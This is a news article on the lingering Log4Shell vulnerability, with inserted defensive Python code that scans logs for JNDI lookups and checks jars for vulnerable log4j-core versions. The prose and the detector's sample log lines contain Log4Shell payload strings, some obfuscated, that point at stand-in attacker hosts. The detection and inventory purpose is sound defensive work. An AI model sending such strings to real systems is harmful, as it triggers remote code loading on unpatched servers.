Log4j is still a problem, a year after its discovery


Log4Shell is a vulnerability we will keep seeing in data breaches over the next decade

This week marks the first anniversary of the discovery of the Log4j/Log4Shell vulnerability, which affects the Apache Log4j logging library for Java. Despite a year having passed since the incident, the number of downloads of vulnerable versions of Log4j is still high: it has been calculated that around 30-40% of all Log4j downloads are still of exposed versions.

As recently reported, many organizations remain vulnerable even though patched versions became available almost immediately.

For those unfamiliar with the vulnerability: it is notable because it can be exploited against any Java application that logs values obtained from external sources, for example when untrusted input ends up in an error message. Vulnerable Log4j 2 versions expand lookup expressions inside logged messages, so a string such as ${jndi:ldap://attacker-host/a} placed in a User-Agent header or a form field makes the server perform a JNDI lookup against a host the attacker controls, which can hand back a Java object the server then loads. No authentication is needed; the only requirement is that the input reaches a log statement.
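The following is an added example, not code from the original article or from the Log4j project: a small Python detector that scans log lines for the lookup expression behind Log4Shell. It first undoes the nested-lookup obfuscation attackers used to slip past naive string matching (${lower:...}, ${upper:...} and the default-value trick ${::-x}, which Log4j expands to x), then looks for ${jndi:scheme:...}. The log lines and the 203.0.113.x addresses are constructed for the example.

```python
import re

# Innermost ${...} expression: a body containing no nested "${" and no "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
# The lookup Log4Shell abuses, matched only after obfuscation has been expanded.
JNDI = re.compile(r"\$\{jndi:([a-z]+):([^}]*)\}", re.IGNORECASE)


def evaluate_lookup(body):
    """Reduce one Log4j lookup body to the text Log4j would expand it to.

    Only the lookups attackers use for obfuscation are modelled here:
    ${lower:x}, ${upper:x}, and the default-value form ${name:-x}, which
    yields x whenever `name` cannot be resolved (the ${::-x} trick).
    Returns None for anything else, including the jndi: lookup itself.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep:
        name = name.lower()
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return None


def normalize(text, max_rounds=16):
    """Expand nested obfuscation lookups from the inside out until stable."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = evaluate_lookup(m.group(1))
            if value is None:
                return m.group(0)  # unresolvable (e.g. jndi:), keep verbatim
            changed = True
            return value

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme, normalized_lookup) for every hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        for m in JNDI.finditer(normalize(line)):
            hits.append((number, m.group(1).lower(), m.group(0)))
    return hits


# Constructed access-log lines (not real traffic); 203.0.113.0/24 is documentation space.
SAMPLE_LOG = [
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - "GET /login HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.5:1099/x}"',
    '203.0.113.9 - - "GET /cart?total=${amount} HTTP/1.1" 404 "curl/7.85"',
]

if __name__ == "__main__":
    for number, scheme, lookup in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: {scheme} lookup -> {lookup}")
```

The benign ${amount} on the last line is left alone because it is not an obfuscation lookup and is not a jndi: lookup, which is the property you want from a detector that runs over production logs. Lines 3 and 4 are exactly the kind of payload that a plain search for the literal string "${jndi:" misses.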

The Log4j vulnerability was a wake-up call for all organizations and a moment many security professionals would like to forget. However, given how widely Log4j is used and the growing number of internal and third-party servers that need patching, the vulnerability will be felt for a long time.

Almost every project built on frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink was affected, as were services including Steam, Apple iCloud, and Minecraft clients and servers.

Sonatype has produced a resource center showing the current state of the vulnerability, as well as a tool to help companies scan their open source dependencies to see whether they are affected.

The dashboard shows the percentage of Log4j downloads that are still of vulnerable versions (currently around 34%, measured since last December). It also shows which parts of the world have seen the highest percentage of vulnerable downloads.
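As an added example (not Sonatype's scanner and not code from the original article), here is how a practitioner can check a jar for a Log4Shell-exposed log4j-core without any network access: read the version from the Maven pom.properties the artifact embeds, and check whether the JndiLookup class, which many teams deleted from the jar as an emergency mitigation, is still present. The version boundaries are those of CVE-2021-44228 (fixed in 2.15.0, with back-ports 2.12.2 for Java 7 and 2.3.1 for Java 6). The jar produced by build_fake_jar is a constructed stand-in for testing, not a real Log4j artifact.

```python
import io
import re
import zipfile

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Pre-release ordering: a final release (rank 9) sorts after any alpha/beta/rc.
_PRE = {"alpha": 0, "beta": 1, "rc": 2}


def parse_version(v):
    """Turn '2.14.1', '2.3' or '2.0-beta9' into a comparable tuple."""
    core, _, pre = v.partition("-")
    nums = [int(x) for x in core.split(".")]
    nums += [0] * (3 - len(nums))
    rank, num = 9, 0
    if pre:
        m = re.fullmatch(r"([a-z]+)-?(\d*)", pre.lower())
        if m:
            rank, num = _PRE.get(m.group(1), 0), int(m.group(2) or 0)
        else:
            rank = 0
    return (nums[0], nums[1], nums[2], rank, num)


def is_log4shell_vulnerable(version):
    """CVE-2021-44228 affects log4j-core 2.0-beta9 up to but not including 2.15.0,
    except the back-port branches fixed in 2.12.2 (Java 7) and 2.3.1 (Java 6)."""
    v = parse_version(version)
    if v[0] != 2 or v < parse_version("2.0-beta9"):
        return False
    if v[:2] == (2, 3):
        return v < parse_version("2.3.1")
    if v[:2] == (2, 12):
        return v < parse_version("2.12.2")
    return v < parse_version("2.15.0")


def inspect_jar(data):
    """Report the embedded log4j-core version and whether JndiLookup is still shipped.

    A jar is only flagged when both hold: the version is in the affected range
    and JndiLookup.class is present (deleting it was the documented workaround).
    """
    result = {"version": None, "jndi_lookup_present": False, "vulnerable": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names:
            props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
            for line in props.splitlines():
                if line.startswith("version="):
                    result["version"] = line.split("=", 1)[1].strip()
        result["jndi_lookup_present"] = JNDI_LOOKUP_CLASS in names
    if result["version"] and result["jndi_lookup_present"]:
        result["vulnerable"] = is_log4shell_vulnerable(result["version"])
    return result


def build_fake_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar: only the two entries
    the check relies on, with a bare class-file magic number as the class body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            POM_PROPERTIES,
            f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n",
        )
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for ver, keep_class in [("2.14.1", True), ("2.14.1", False), ("2.17.1", True)]:
        print(ver, "JndiLookup kept" if keep_class else "JndiLookup removed",
              inspect_jar(build_fake_jar(ver, keep_class)))
```

Two caveats for real use. First, the later advisories (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832) moved the recommended floor to 2.17.1, 2.12.4 and 2.3.2 respectively, so anything below those is still worth upgrading even though this check clears it for Log4Shell itself. Second, fat jars, wars and ears carry log4j-core nested inside other archives, so a production scanner has to recurse into archive entries rather than only inspecting top-level jars.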

Brian Fox, CTO of Sonatype, says:

Log4j was a stark reminder of the critical importance of securing the software supply chain. It was used in virtually all modern applications and affected the services of organizations around the world. One year after the Log4Shell incident, the situation remains grim. According to our data, 30-40% of all Log4j downloads are for the vulnerable version, even though a patch was released within 24 hours of the premature vulnerability disclosure.

He adds that it is:

Imperative for organizations to recognize that most open source risks lie with consumers, who should adopt best practices rather than blame faulty code. Log4j is not an isolated incident: 96% of downloads of vulnerable open source components had a patched version.

Organizations need better visibility of every component used in their software supply chains. This is why quality software composition analysis solutions are so important today as the world contemplates the utility of SBOMs in the future.

UK and European software policy should require commercial consumers of free software to be able to carry out the equivalent of a specific recall, just as manufacturers of physical goods, like the car industry, expect. General visibility will grant additional benefits to organizations, such as the ability to make decisions based on it.

As the year went on, it became clear that attackers would continue to exploit the vulnerability. In February, Iranian state-sponsored hackers used the flaw to gain access to a US government network, illegally mine cryptocurrency, steal credentials and change passwords. Then, in October, a group associated with the Chinese government used the vulnerability to launch attacks against various targets, including a Middle Eastern country and an electronics manufacturer.

The Log4j vulnerability continues to affect enterprises today. It consistently ranks first or second in the threat reports of various cybersecurity consultancies, and it was affecting 41% of organizations globally as of October 2022.

